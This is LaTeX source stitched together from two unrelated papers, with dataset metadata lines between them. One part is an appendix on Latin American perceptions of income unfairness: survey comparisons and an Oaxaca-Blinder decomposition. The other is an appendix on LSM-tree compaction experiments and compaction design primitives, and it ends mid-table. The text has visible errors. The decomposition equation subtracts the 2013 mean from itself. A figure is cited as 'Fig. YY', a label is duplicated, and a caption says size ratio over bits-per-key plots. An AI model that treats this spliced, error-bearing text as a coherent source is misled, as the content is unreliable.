\cmidrule{2-10} \multicolumn{1}{l|}{Uruguay} & \cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Venezuela} & \cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} \\
\cmidrule{2-10} \multicolumn{1}{r}{} & \multicolumn{1}{r}{} & & & & & & & & \\
\cmidrule{2-2} & \cellcolor[rgb]{ .31, .506, .741} & \multicolumn{8}{l}{Both perceptions and inequality data available} \\
\cmidrule{2-2} & \cellcolor[rgb]{ .969, .588, .275} & \multicolumn{8}{l}{Inequality was calculated with a close survey} \\
\cmidrule{2-2} & \cellcolor[rgb]{ .608, .733, .349} & \multicolumn{8}{l}{Inequality was calculated with a linear interpolation} \\
\cmidrule{2-2} & \cellcolor[rgb]{ .749, .749, .749} & \multicolumn{8}{l}{Latinobar\'ometro did not conduct survey in this year} \\
\cmidrule{2-2} \end{tabular}%
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify
\end{singlespace}
}
\end{table}
\subsection{Imputation of Missing Values for the Regression Analysis}
Two of our individual-level variables (political ideology and religion) have many missing values in some country-years. To deal with this in our regressions, we imputed the average value of each variable to individuals with a missing value. In those cases, we included in the regression a dummy that takes the value one if the value of the variable was imputed and zero otherwise. The results are similar if we do not impute the values, but the sample size of the regressions is smaller.
\subsection{Comparison between Latinobar\'ometro's and SEDLAC's samples} \label{app_lb_sedlac}
To assess whether there are systematic differences between Latinobar\'ometro's sample and the household surveys' sample, in Appendix Table \ref{tab-lat-sedlac} we compare a set of variables available in both datasets during 2013. To ensure comparability across databases, we restrict the calculations to individuals over age 18 and countries with data available in both harmonization projects.
In general, the samples are similar in observable characteristics. For instance, the average age in Latinobar\'ometro's 2013 sample is 40.6 years, while in SEDLAC it is 42.7 years. Similarly, the percentage of males is 48.9\% in Latinobar\'ometro and 47.6\% in SEDLAC. The main difference arises from educational attainment. On average, the SEDLAC sample is more educated: 46.1\% of the population has secondary education or more, while this figure is 38.8\% in Latinobar\'ometro.
\begin{table}[H]{\scriptsize
\begin{center}
\caption{Descriptive statistics in Latinobar\'ometro and SEDLAC, 2013 (selected countries)} \label{tab-lat-sedlac}
\begin{tabular}{lcccccccc}
\midrule
& \multicolumn{2}{c}{Mean} & & \multicolumn{2}{c}{Standard Dev.} & & \multicolumn{2}{c}{Observations} \\
\cmidrule{2-3}\cmidrule{5-6}\cmidrule{8-9} & Latinob. & SEDLAC & & Latinob. & SEDLAC & & Latinob. & SEDLAC \\
& (1) & (2) & & (3) & (4) & & (5) & (6) \\
\midrule
\textbf{\hspace{-1em} Panel A. Sociodemographic} & & & & & & & & \\
Age & 40.59 & 42.68 & & 16.43 & 17.25 & & 14,855 & 1,004,894 \\
Male (\%) & 48.97 & 47.63 & & 0.50 & 0.50 & & 14,855 & 1,004,894 \\
Married or civil union (\%) & 56.77 & 36.41 & & 0.50 & 0.48 & & 14,804 & 915,117 \\
\multicolumn{3}{l}{\textbf{\hspace{-1em} Panel B. Education and Labor market}} & & & & & & \\
Literate (\%) & 91.18 & 92.17 & & 0.28 & 0.27 & & 14,855 & 1,004,744 \\
Secondary education or more (\%) & 38.83 & 46.11 & & 0.49 & 0.50 & & 14,855 & 1,001,672 \\
Economically active (\%) & 65.14 & 68.66 & & 0.48 & 0.46 & & 14,855 & 1,004,718 \\
Unemployed (\%) & 5.78 & 4.08 & & 0.23 & 0.20 & & 14,855 & 1,004,718 \\
\textbf{\hspace{-1em} Panel C. Assets and Services} & & & & & & & & \\
Access to a sewerage (\%) & 68.76 & 63.41 & & 0.46 & 0.48 & & 13,799 & 975,726 \\
Car (\%) & 26.37 & 21.09 & & 0.44 & 0.41 & & 11,612 & 643,350 \\
Computer (\%) & 46.55 & 47.82 & & 0.50 & 0.50 & & 12,747 & 894,003 \\
Fridge (\%) & 82.76 & 88.89 & & 0.38 & 0.31 & & 12,763 & 894,003 \\
Homeowner (\%) & 74.09 & 69.64 & & 0.44 & 0.46 & & 14,761 & 1,003,306 \\
Mobile (\%) & 86.91 & 91.78 & & 0.34 & 0.27 & & 12,754 & 896,079 \\
Washing machine (\%) & 60.49 & 56.88 & & 0.49 & 0.50 & & 11,816 & 848,350 \\
Landline (\%) & 40.22 & 39.47 & & 0.49 & 0.49 & & 12,736 & 896,425 \\
\midrule
\end{tabular}
\end{center}
\begin{singlespace}
\noindent \justify \textbf{Note:} This table compares the observable characteristics of individuals in Latinobar\'ometro and SEDLAC. Summary statistics were calculated on a restricted sample (individuals aged over 18) to ensure comparability between both datasets, pooling data from 14 countries in 2013: Argentina, Bolivia, Brazil, Chile, Colombia, Costa Rica, Dominican Republic, Ecuador, El Salvador, Honduras, Panama, Peru, Paraguay, and Uruguay.
\end{singlespace}
}
\end{table}
\section{The Oaxaca-Blinder Decomposition} \label{sec_oaxaca}
\setcounter{table}{0}
\setcounter{figure}{0}
\setcounter{equation}{0}
\renewcommand{\thetable}{C\arabic{table}}
\renewcommand{\thefigure}{C\arabic{figure}}
\renewcommand{\theequation}{C\arabic{equation}}
The starting point to decompose changes in unfairness perceptions between 2002 and 2013 is the following equation:
\begin{align}
\text{Unfair}_{ict} = \beta_t X_{ict} + \gamma_t \text{Gini}_{ct} + \varepsilon_{ict} \quad \text{for} \quad t \in \{2002, 2013\},
\end{align}
where $t$ indicates the year in which perceptions are elicited and $X_{ict}$ is a vector that contains individual-level controls. The fraction of individuals who perceive the income distribution as unfair in year $t$ can be calculated as
\begin{align}
\overline{\text{Unfair}}_{t} = \hat{\beta}_{t} \bar{X}_{t} + \hat{\gamma}_{t} \overline{\text{Gini}}_{t} \quad \text{for} \quad t \in \{2002, 2013\},
\end{align}
where $\bar{X}_t$ is a vector of the average values of the explanatory variables in year $t$, and $\hat{\beta}$ the vector of OLS-estimated coefficients. The change in unfairness beliefs between 2013 and 2002 is given by
\begin{align} \label{eq-diff-fair}
\underbrace{\overline{\text{Unfair}}_{2013} - \overline{\text{Unfair}}_{2013}}_{\equiv \Delta \text{Unfair}} = (\hat{\beta}_{2013} \bar{X}_{2013} + \hat{\gamma}_{2013} \overline{\text{Gini}}_{2013}) - (\hat{\beta}_{2002} \bar{X}_{2002} + \hat{\gamma}_{2002} \overline{\text{Gini}}_{2002})
\end{align}
Adding and subtracting $\hat{\beta}_{2002} \bar{X}_{2013} + \hat{\gamma}_{2002} \overline{\text{Gini}}_{2013}$ to equation \eqref{eq-diff-fair} yields
\begin{align} \label{eq_oaxaca}
\Delta \text{Unfair} &=
\underbrace{\hat{\beta}_{2002} (\bar{X}_{2013} - \bar{X}_{2002})}_{\equiv \Delta \text{Demog.}} +
\underbrace{\hat{\gamma}_{2002} (\overline{\text{Gini}}_{2013} - \overline{\text{Gini}}_{2002})}_{\equiv \Delta \text{Gini}} \notag \\ &+ \underbrace{\bar{X}_{2013} (\hat{\beta}_{2013} - \hat{\beta}_{2002})+ \overline{\text{Gini}}_{2013} (\hat{\gamma}_{2013} - \hat{\gamma}_{2002})}_{\text{Residual}}
\end{align}
The first two terms of equation \eqref{eq_oaxaca} are usually known as the ``composition effect.'' These effects capture the difference between the average perceptions in 2002 and the counterfactual perceptions 2013 had the $\hat{\beta}$'s and $\hat{\gamma}$---i.e., the elasticity of perceptions to the different covariables---remained constant during the 2002--13 period. The first term captures differences in individual-level demographic variables that determine unfairness perceptions in the model (such as educational attainment, age, and employment status). The second term captures changes in aggregate trends in income inequality.
The third term of \eqref{eq_oaxaca} reflects the difference between the average fairness views in 2013 and the counterfactual fairness views in 2002 with the observable attributes of 2013. Thus, this component reflects changes in fairness views due to changes in the elasticity of the different covariables between both years. Since we cannot explain why the coefficients attached to each variable changed, this term is usually viewed as the ``unexplained'' part of the decomposition and treated as the residual of the decomposition.
| 2024-02-18T23:40:02.230Z | 2022-11-01T01:17:07.000Z | algebraic_stack_train_0000 | 1,148 | 15,637 |
|
proofpile-arXiv_065-5738 |
\section{Supplementary Experiments}
\begin{figure*}[!ht]
\vspace{-1em}
\centering
\begin{subfigure}[b]{0.245\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/compaction/W1_quantile_compaction_latency_comp}.eps}
\vspace{-1cm}
\caption{Overall compaction latency}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.245\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/compaction/W1_quantile_compaction_cpu_latency_comp}.eps}
\vspace{-1cm}
\caption{CPU latency for compactions}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.245\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/point_query/W1_filter_block_cache_miss_comp}.eps}
\vspace{-1cm}
\caption{Block misses for point queries}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.245\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/point_query/W1_index_block_cache_miss_comp}.eps}
\vspace{-1cm}
\caption{Index misses for point queries}
\end{subfigure}
\vspace{-0.2cm}
\caption{(a,b) shows that correlation between the overall latency for compactions and the CPU cycles spent for compactions; (b,c) shows how the misses to the filter and index blocks change across different compaction strategies as the proportion of non-empty and empty queries change in a lookup-only workload.}
\label{fig:W1-supp}
\end{figure*}
In this appendix, we present the supplementary results along with the auxiliary observations (\textbf{o}) that were omitted from the main paper due to space constraints.
In the interest of space, we limit our discussion to the most interesting results and observations.
For better readability, we re-use the subsection titles used in \S \ref{sec:results} throughout this appendix.
\subsection{Performance Implications}
Here we present the supplementary results for the serial execution of the ingestion-only and lookup-only workloads.
Details about the workload specifications along with the experimental setup can be found throughout \S \ref{subsec:performance}.
\Paragraph{\mob The CPU Cost for Compactions is Significant}
The CPU cycles spent due to compactions (Fig. \ref{fig:W1-supp}(b)) is close to $50\%$ of the overall time spent for compactions (Fig. \ref{fig:W1-supp}(a), which is same as Fig. \ref{fig:W1}(c)) regardless of the compaction strategy.
During a compaction job CPU cycles are spent in (1) the preparation phase to obtain necessary locks and take snapshots, (2) sort-merging the entries during the compaction, (3) updating the file pointers and metadata, and (4) synchronizing the output files post compaction.
Among these, the time spent to sort-merge the data in memory dominates the other operations.
This explains the similarity in patterns between Fig. \ref{fig:W1-supp}(a) and \ref{fig:W1-supp}(b).
As both the CPU time and the overall time spent for compactions are driven by the total amount of data compacted, the plots look largely similar.
\Paragraph{\mob Dissecting the Lookup Performance}
To analyze the lookup performance presented in Fig.~\ref{fig:W1}(h), we further plot the block cache misses for Bloom filters blocks in Fig.~\ref{fig:W1-supp}(c), and the index (fence pointer) block misses in Fig.~\ref{fig:W1-supp}(d).
Note that, both empty and non-empty lookups must first fetch the filter blocks, hence, for the filter block misses remain almost unaffected as we vary $\alpha$.
Not that \texttt{Tier} has more misses because it has more overall sorted runs.
Subsequently, the index blocks are fetched only if the filter probe returns positive.
With $10$ bits-per-key the false positive is only $0.8\%$, and as we have more empty queries, that is, increasing $\alpha$, fewer index blocks are accessed.
The filter blocks are maintained at a granularity of files and in our setup amount to $20$ I/Os.
The index blocks are maintained for each disk page and in our setup amount to $4$ I/Os, being $1/5^{th}$ of the cost for fetching the filter blocks.\footnote{filter block size per file = \#entries per file $*$ bits-per-key = $512$*$128$*$10$B = $80$kB; index block size per file = \#entries per file $*$ (key size$+$pointer size) = $512 * (16$+$16)$B = $16$kB.}.
The cost for fetching the filter block is $5\times$ the cost for fetching the index block.
This, coupled with the probabilistic fetching of the index block (depending on $\alpha$ and the false positive rate ($FPR=0.8\%$) of the filter) leads to a non-monotonic latency curve for point lookups as $\alpha$ increases, and this behavior is persistent regardless of the compaction strategy.
\begin{figure}
\vspace{-1em}
\centering
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W18/W18.1_mean_compaction_latency_comp}.eps}
\caption{Mean compaction latency}
\label{fig:W18_1_mean_compaction_latency}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W18/W18.1_write_delay_comp}.eps}
\caption{Write delay}
\label{fig:W18_1_write_delay}
\end{subfigure}
\vspace{-1em}
\caption{Varying Block Cache (insert-only)}
\label{fig:W18.1}
\end{figure}
\begin{figure}
\vspace{-1em}
\centering
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W18/W18.2_mean_compaction_latency_comp}.eps}
\caption{Mean compaction latency}
\label{fig:W18_2_mean_compaction_latency}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W18/W18.2_write_delay_comp}.eps}
\caption{Write delay}
\label{fig:W18_2_write_delay}
\end{subfigure}
\vspace{-1em}
\caption{Varying Block Cache (interleaving with $10\%$ point lookups)}
\label{fig:W18.2}
\end{figure}
We vary the block cache for insert-only and mixed workloads ($10\%$ existing point lookups interleaved with insertions). For mixed workload, the mean compaction latency remains stable when block cache varies from $8$MB to $256$MB. However, for insert-only workload, the mean compaction latency increases sharply when block cache is more than $32$ MB (Fig. \ref{fig:W18_1_mean_compaction_latency} and \ref{fig:W18_2_mean_compaction_latency}). We observe that for insert-only workload, the write delay (also termed as write stall) is more than twice that of mixed workload (Fig. \ref{fig:W18_1_write_delay} and \ref{fig:W18_2_write_delay}). We leave this interesting phenomenon for future discussion. Compared to full and partial compaction, tiering is more stable with respect to different block cache size.
\subsection{Varying Page Size}
When we vary the page size, we observe almost consist patterns across different compaction strategies for all metrics (Fig. \ref{fig:W19_1_mean_compaction_latency} and \ref{fig:W19_1_write_ampli}). It turns out that compaction strategy does not play a big role for different page sizes.
\begin{figure}
\vspace{-1em}
\centering
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W19/W19.1_mean_compaction_latency_comp}.eps}
\caption{Mean compaction latency}
\label{fig:W19_1_mean_compaction_latency}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W19/W19.1_write_ampli_comp}.eps}
\caption{Write amplification}
\label{fig:W19_1_write_ampli}
\end{subfigure}
\vspace{-1em}
\caption{Varying Page Size (insert-only)}
\label{fig:W19.1}
\end{figure}
\subsection{Varying Size Ratio}
We also compare the performance for different size ratio. According to Fig. \ref{fig:W20_1_mean_compaction_latency}, tiering has higher mean compaction latency compared to other strategies when the size ratio is no more than 6 and after 6, full compaction and oldest compaction become the top-2 time-consuming strategies. In terms of tail compaction strategy in Fig. \ref{fig:W20_1_P100_compaction_latency}, tiering is still the worst one compared to other strategies.
\begin{figure}
\vspace{-1em}
\centering
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/compaction/W20.1_mean_compaction_latency_comp}.eps}
\caption{Mean compaction latency}
\label{fig:W20_1_mean_compaction_latency}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W20/W20.1_P100_compaction_latency_comp}.eps}
\caption{Tail compaction latency}
\label{fig:W20_1_P100_compaction_latency}
\end{subfigure}
\vspace{-1em}
\caption{Varying Size Ratio (insert-only)}
\label{fig:W20.1}
\end{figure}
\subsection{Varying Bits Per Key (BPK)}
We also conduct the experiment to investigate the BPK's influence over compaction. From Fig. \ref{fig:W20_1_mean_compaction_latency} and \ref{fig:W21_2_P100_compaction_latency}, the mean and tail compaction latency may increase a little bit with increasing bits per key since larger filter blocks should be written but this increasing is very tiny since the increasing filter block is quite smaller than all data blocks. At the same, we also observe that the query latency even increases with increasing BPK (see Fig. \ref{fig:W21_2_empty_get_latency} and \ref{fig:W21_2_existing_get_latency}). This might come from higher filter block misses (Fig. YY) and this pattern becomes more obvious for existing queries in which case, accessing filter blocks is completely an extra burden.
\begin{figure}
\vspace{-1em}
\centering
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W21/W21.2_mean_compaction_latency_comp}.eps}
\caption{Mean compaction latency}
\label{fig:W21_2_mean_compaction_latency}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W21/W21.2_P100_compaction_latency_comp}.eps}
\caption{Tail compaction latency}
\label{fig:W21_2_P100_compaction_latency}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W21/W21.3_empty_mean_get_latency_comp}.eps}
\caption{Mean get latency (empty queries)}
\label{fig:W21_2_empty_get_latency}
\end{subfigure}
\hfill
\begin{subfigure}[b]{0.23\textwidth}
\centering
\includegraphics[width=\textwidth]{{exp/W21/W21.3_existing_mean_get_latency_comp}.eps}
\caption{Mean get latency (existing queries)}
\label{fig:W21_2_existing_get_latency}
\end{subfigure}
\vspace{-1em}
\caption{Varying Size Ratio (insert-only)}
\label{fig:W20.1}
\end{figure}
\subsection{Compaction Primitives}
We define a compaction strategy as \textit{an ensemble of design primitives that represents the fundamental decisions about the physical data layout and the data (re-)organization policy}.
Each primitive answers a fundamental design question.
\begin{itemize}[leftmargin=5mm]
\item[1)] \textit{Compaction trigger}: \textbf{When} to re-organize the data layout?
\item[2)] \textit{Data layout}: \textbf{How} to lay out the data physically on storage?
\item[3)] \textit{Compaction granularity}: \textbf{How much} data to move at-a-time during layout re-organization?
\item[4)] \textit{Data movement policy}: \textbf{Which} block of data to be moved during re-organization?
\end{itemize}
Together, these design primitives define \textit{when} and \textit{how} an LSM-engine re-organizes the data layout on the persistent media.
The proposed primitives capture any state-of-the-art LSM-compaction strategy and also enables synthesizing new or unexplored compaction strategies.
Below, we define these four design primitives.
\begin{figure*}
\vspace{-0.2in}
\centering
\includegraphics[width=\textwidth]{omnigraffle/primitives.pdf}
\vspace{-0.25in}
\caption{The primitives that define LSM compactions: trigger, data layout, granularity, and data movement policy.}
\label{fig:comp_prims}
\vspace{-0.1in}
\end{figure*}
\subsubsection{\textbf{Compaction Trigger}}
Compaction triggers refer to the set of events that can initiate a compaction job.
The most common compaction trigger is based on the \textit{degree of saturation} of a level in an LSM-tree~\cite{Alsubaiee2014,FacebookRocksDB,GoogleLevelDB,HyperLevelDB,Tarantool,Golan-Gueta2015,Sears2012}.
The degree of saturation for Level $i$ ($1 \leq i \leq L-1$) is typically measured as the ratio of the number of bytes of data stored in Level $i$ to the theoretical capacity in bytes for Level $i$.
Once the degree of saturation goes beyond a pre-defined threshold, one or more immutable files from Level $i$ are marked for compaction.
Some LSM-engines use the file count in a level to compute degree of saturation~\cite{GoogleLevelDB,Huang2019,HyperLevelDB,RocksDB2020,ScyllaDB}.
Note that the file count-based degree of saturation works only when all immutable files are of equal size, or for systems that have a tunable file size.
The ``\#sorted runs'' compaction trigger, triggers a compaction if the number of sorted runs (or ``tiers'') in a level goes past a predefined threshold, regardless of the size of a level.
Other compaction triggers include the \textit{staleness of a file}, the \textit{tombstone-based time-to-live}, and \textit{space} and \textit{read amplification}.
For example, to ensure propagation of updates and deletes to the deeper levels of a tree, some LSM-engines assign a time-to-live (TTL) for each file during its creation.
Each file can live in a level for a bounded time, and once the TTL expires, the file is marked for compaction~\cite{FacebookRocksDB}.
Another delete-driven compaction trigger ensures bounded persistence latency of deletes in LSM-trees through a different timestamp-based scheme.
Each file containing at least one tombstone is assigned a special time-to-live in each level, and up on expiration of this timer, the file is marked for compaction~\cite{Sarkar2020}.
Below, we present a list of the most common \textbf{compaction triggers}:
\begin{itemize} [leftmargin=5mm]
\item[i)] \textit{\textbf{Level saturation}}: level size goes beyond a nominal threshold
\item[ii)] \textit{\textbf{\#Sorted runs}}: sorted run count for a level reaches a threshold
\item[iii)] \textit{\textbf{File staleness}}: a file lives in a level for too long
\item[iv)] \textit{\textbf{Space amplification (SA)}}: overall SA surpasses a threshold
\item[v)] \textit{\textbf{Tombstone-TTL}}: files have expired tombstone-TTL
\end{itemize}
\subsubsection{\textbf{Data layout}}
The data layout is driven by the compaction eagerness, and determines the data organization on disk by controlling the number of sorted runs per level.
Compactions move data between storage and memory, consuming a significant portion of the device bandwidth.
There is, thus, an inherent competition for the device bandwidth between ingestion (external) and compaction (internal) -- a trade-off depending on the eagerness of compactions.
The data layout is commonly classified as \emph{leveling} and
\emph{tiering}~\cite{Dayan2017,Dayan2018a}.
With leveling, once a compaction is triggered in Level $i$, the file(s) marked for compaction are merged with the overlapping file(s) from Level $i+1$, and the result is written back to Level $i+1$.
As a result, Level $i+1$ ends up with a (single) longer sorted run of immutable files~\cite{FacebookRocksDB,Golan-Gueta2015,GoogleLevelDB,Huang2019,HyperLevelDB,Sears2012}.
For tiering, each level may contain more than one sorted runs with overlapping key domains.
Once a compaction is triggered in Level $i$, all sorted runs in Level $i$ are merged together and the result is written to Level $i+1$ as a new sorted run without disturbing the existing runs in that level~\cite{Alsubaiee2014,ApacheCassandra,ApacheHBase,FacebookRocksDB,ScyllaDB,Tarantool}.
A hybrid design is proposed in Dostoevsky~\cite{Dayan2018} where the last level is implemented as leveled and all the remaining levels on disk are tiered.
A generalization of this idea is proposed in the literature as a continuum of designs~\cite{Dayan2019,Idreos2019} that allows each level to separately decide between leveling and tiering.
Among production systems, RocksDB implements the first disk-level (Level $1$) as tiering~\cite{RocksDB2020}, and it is allowed to grow perpetually in order to avoid write-stalls~\cite{Balmau2019,Balmau2020,Callaghan2017} in ingestion-heavy workloads.
Below is a list of the most common options for \textbf{the data layout}:
\begin{itemize} [leftmargin=5mm]
\item[i)] \textit{\textbf{Leveling}}: one sorted run per level
\item[ii)] \textit{\textbf{Tiering}}: multiple sorted runs per level
\item[iii)] \textit{\textbf{\bm{$1$}-leveling}}: \textit{tiering} for Level $1$; \textit{leveling} otherwise
\item[iv)] \textit{\textbf{\bm{$L$}-leveling}}: \textit{leveling} for last level; \textit{tiering} otherwise
\item[v)] \textit{\textbf{Hybrid}}: a level can be \textit{tiering} or \textit{leveling} independently
\end{itemize}
\subsubsection{\textbf{Compaction Granularity}}
Compaction granularity refers to the amount of data moved during a single compaction job.
One way to compact data is by sort-merging and moving all data from a level to the next level -- we refer to this as \textit{full compaction}~\cite{Alkowaileet2020,Alsubaiee2014,Teng2017,WiredTiger}.
This results in periodic bursts of I/Os due to large data movement during compactions, and as a tree grows deeper, the latency spikes are exacerbated causing prolonged write stalls.
To amortize the I/O costs due to compactions, leveled LSM-based engines employ \textit{partial compaction}~\cite{FacebookRocksDB,GoogleLevelDB,Huang2019,ONeil1996,Sarkar2020,ScyllaDB}, where instead of moving a whole level, a smaller granularity of data participates in every compaction.
The granularity of data can be a single file~\cite{Dong2017,Huang2019,Sarkar2020} or multiple files~\cite{Alkowaileet2020,Alsubaiee2014,ApacheCassandra,ONeil1996} depending on the system design and the workload.
Note that, partial compaction does not radically change the total amount of data movement due to compactions, but amortizes this data movement uniformly over time, thereby preventing undesired latency spikes.
A compaction granularity of ``sorted runs'' applies principally to LSMs with lazy merging policies.
Once a compaction is triggered in Level $i$, all sorted runs (or tiers) in Level $i$ are compacted together, and the resulting entries are written to Level $i+1$ as a new immutable sorted run.
Below, we present a list of the most common \textbf{compaction granularity} options:
\begin{itemize} [leftmargin=5mm]
\item[i)] \textit{\textbf{Level}}: all data in two consecutive levels
\item[ii)] \textit{\textbf{Sorted runs}}: all sorted runs in a level
\item[iii)] \textit{\textbf{File}}: one sorted file at a time
\item[iv)] \textit{\textbf{Multiple files}}: several sorted files at a time
\end{itemize}
\subsubsection{\textbf{Data Movement Policy}}
When \textit{partial compaction} is employed, the data movement policy selects
which file(s) to choose for compaction.
While the literature commonly refers to this decision as \textit{file picking policy}~\cite{Dong2016}, we use the term \textit{data movement} to generalize for any possible data movement granularity.
A na\"ive way to choose file(s) is at random or by using a round-robin policy~\cite{GoogleLevelDB,HyperLevelDB}.
These data movement policies do not focus on optimizing for any particular performance metric, but help in reducing space amplification.
To optimize for read throughput, many production data stores~\cite{Huang2019,FacebookRocksDB} select the ``coldest'' file(s) in a level once a compaction is triggered.
Another common optimization goal is to minimize write amplification.
In this policy, files with the least overlap with the target level are marked for compaction~\cite{Callaghan2016,Dong2016}.
To reduce space amplification, some storage engines choose files with the highest number of tombstones and/or updates~\cite{FacebookRocksDB}.
Another delete-aware approach introduces a tombstone-age driven file picking policy that aims to timely persist logical deletes~\cite{Sarkar2020}.
Below, we present the list of the common \textbf{data movement policies}:
\begin{itemize} [leftmargin=5mm]
\item[i)] \textit{\textbf{Round-robin}}: chooses files in a round-robin manner
\item[ii)] \textit{\textbf{Least overlapping parent}}: file with least overlap with ``parent'
\item[iii)] \textit{\textbf{Least overlapping grandparent}}: as above with ``grandparent''
\item[iv)] \textit{\textbf{Coldest}}: the least recently accessed file
\item[v)] \textit{\textbf{Oldest}}: the oldest file in a level
\item[vi)] \textit{\textbf{Tombstone density}}: file with \#tombstones above a threshold
\item[vii)] \textit{\textbf{Tombstone-TTL}}: file with expired tombstones-TTL
\end{itemize}
\subsection{Compaction as an Ensemble of Primitives}
Every compaction strategy takes one or more values for each of the four primitives.
The trigger, granularity, and data movement policy are multi-valued primitives, whereas data layout is single-valued.
For example, a common LSM design~\cite{Alkowaileet2020} has a \textbf{leveled} LSM-tree (\textit{data layout}) that compacts \textbf{whole levels} at a time (\textit{granularity}) once a \textbf{level reaches a nominal size} (\textit{trigger}).
This design does not implement many subtle optimizations including partial compactions, and by definition, does not need a data movement policy.
A more complex example is the compaction strategy for a \textbf{leveled} LSM-tree (\textit{data layout}) in which compactions are performed at the \textit{granularity} of a \textbf{file}.
A compaction is \textit{triggered} if either (a) a \textbf{level reaches its capacity} or (b) a \textbf{file containing tombstones is retained in a level longer than a pre-set TTL}~\cite{Sarkar2020}.
Once triggered, the \textit{data movement policy} chooses (a) \textbf{the file with the highest density of tombstones}, if there is one or (b) \textbf{the file with the least overlap with the parent level}, otherwise.
\begin{table}[t]
\centering
\resizebox{0.475\textwidth}{!}{%
\LARGE
\begin{tabular}{l|c|ccccc|cccc|cccccccc}
\toprule
\multicolumn{1}{c|}{\multirow{9}{*}{\begin{tabular}[c]{@{}c@{}}\textbf{Database} \end{tabular}}}
& \multirow{9}{*}{\begin{tabular}[c]{@{}c@{}}\textbf{Data layout} \end{tabular}}
& \multicolumn{5}{c|}{\textbf{\multirow{1}{*}{\begin{tabular}[c]{@{}c@{}}\textbf{Compaction} \end{tabular}}}}
& \multicolumn{4}{c|}{\textbf{\multirow{1}{*}{\begin{tabular}[c]{@{}c@{}}\textbf{Compaction} \end{tabular}}}}
& \multicolumn{7}{c}{\textbf{\multirow{1}{*}{\begin{tabular}[c]{@{}c@{}}\textbf{Data Movement} \end{tabular}}}} \\
\multicolumn{1}{c|}{}
& \multicolumn{1}{c|}{}
& \multicolumn{5}{c|}{\textbf{Trigger}}
& \multicolumn{4}{c|}{\textbf{Granularity}}
& \multicolumn{7}{c}{\textbf{Policy}} \\ \cline{3-19}
&
& \rotatebox[origin=l]{90}{Level saturation}
& \rotatebox[origin=l]{90}{\#Sorted runs}
& \rotatebox[origin=l]{90}{File staleness}
& \rotatebox[origin=l]{90}{Space amp.}
& \rotatebox[origin=l]{90}{Tombstone-TTL\hspace*{1mm}}
& \rotatebox[origin=l]{90}{Level}
& \rotatebox[origin=l]{90}{Sorted run}
& \rotatebox[origin=l]{90}{File (single)}
& \rotatebox[origin=l]{90}{File (multiple)}
& \rotatebox[origin=l]{90}{Round-robin}
& \rotatebox[origin=l]{90}{Least overlap ($+$$1$) }
& \rotatebox[origin=l]{90}{Least overlap ($+$$2$)}
& \rotatebox[origin=l]{90}{Coldest file}
& \rotatebox[origin=l]{90}{Oldest file}
& \rotatebox[origin=l]{90}{Tombstone density}
& \rotatebox[origin=l]{90}{Expired TS-TTL}
& \rotatebox[origin=l]{90}{N/A (entire level)} \\ \hline \bottomrule
